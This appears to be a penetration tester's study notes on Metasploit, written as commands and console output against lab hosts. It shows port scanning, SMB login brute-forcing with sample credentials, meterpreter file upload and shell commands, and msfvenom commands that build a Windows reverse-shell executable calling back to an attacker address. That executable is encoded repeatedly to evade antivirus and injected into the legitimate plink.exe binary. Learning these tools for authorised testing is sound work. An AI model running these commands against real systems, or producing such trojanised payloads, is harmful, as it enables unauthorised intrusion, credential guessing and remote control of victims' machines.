Metasploit

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > back
msf6 > 

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/syn
msf6 auxiliary(scanner/portscan/syn) > previous
msf6 auxiliary(scanner/portscan/tcp) > 

msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) >

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.120.11
RHOSTS => 192.168.120.11

msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.120.11:       - 192.168.120.11:80 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:139 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:135 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:445 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:5040 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:5357 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:7680 - TCP OPEN
[+] 192.168.120.11:       - 192.168.120.11:9121 - TCP OPEN
[*] 192.168.120.11:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/portscan/tcp) > services
Services
========

host            port  proto  name           state  info
----            ----  -----  ----           -----  ----
192.168.120.11  80    tcp                   open   
192.168.120.11  135   tcp                   open   
192.168.120.11  139   tcp                   open   
192.168.120.11  445   tcp                   open   
192.168.120.11  5040  tcp                   open   
192.168.120.11  5357  tcp                   open   
192.168.120.11  7680  tcp                   open   
192.168.120.11  9121  tcp                   open 

msf6 auxiliary(scanner/portscan/tcp) > db_nmap
[*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
msf6 auxiliary(scanner/portscan/tcp) > db_nmap 192.168.120.11 -A -Pn
[*] Nmap: 'Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.'
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-21 11:37 EST
[*] Nmap: Nmap scan report for 192.168.120.11
[*] Nmap: Host is up (0.075s latency).
[*] Nmap: Not shown: 995 closed ports
...

msf6 auxiliary(scanner/portscan/tcp) > hosts

Hosts
=====

address         mac  name             os_name       os_flavor  os_sp  purpose  info  comments
-------         ---  ----             -------       ---------  -----  -------  ----  --------
192.168.120.11       DESKTOP-6UTT671  Windows 2008                    server         
192.168.121.10       CLIENT251        Windows 10    Pro               client         
       

msf6 auxiliary(scanner/portscan/tcp) > services -p 445
Services
========

host            port  proto  name          state  info
----            ----  -----  ----          -----  ----
192.168.120.11  445   tcp    microsoft-ds  open  

msf6 auxiliary(scanner/portscan/tcp) > workspace
  test
* default
msf6 auxiliary(scanner/portscan/tcp) > workspace test
[*] Workspace: test
msf6 auxiliary(scanner/portscan/tcp) >

in msfconsole

search -h
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_version
info
# search database for hosts with port 445 open and add to RHOSTS (--rhosts)
services -p 445 --rhosts 
run
use auxiliary/scanner/smb/smb_login
options
set SMBUser Offsec
set SMBPass notarealpassword
setg RHOSTS 192.168.120.11
set THREADS 10
run
set SMBPass Qwerty09!
run
creds
set USERPASS_FILE /home/kali/users.txt
run
use auxiliary/scanner/rdp/rdp_scanner
show options
run

Note that in Metasploit, the "/" character is used to denote whether a payload is staged or not, so "shell_reverse_tcp" is not staged, whereas "shell/reverse_tcp" is.

staged = in 2 parts

meterpreter

sysinfo
getuid
upload /usr/share/windows-resources/binaries/nc.exe c:\\Users\\Offsec
download "c:\windows\system32\calc.exe" /tmp/calc.exe
shell

msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

  • -e to specify the encoder type

  • -i to set the desired number of encoding iterations (antivirus)

  • -x inject a payload into an existing PE file

A little known secret is that this process can also be accomplished from within msfconsole with the generate command. For example, we can do the following to recreate the previous msfvenom example:

msf6 payload(windows/shell_reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
[*] Writing 311296 bytes to shell_reverse_msf_encoded_embedded.exe...

PreviousPentestNextKerberos Authentication

Last updated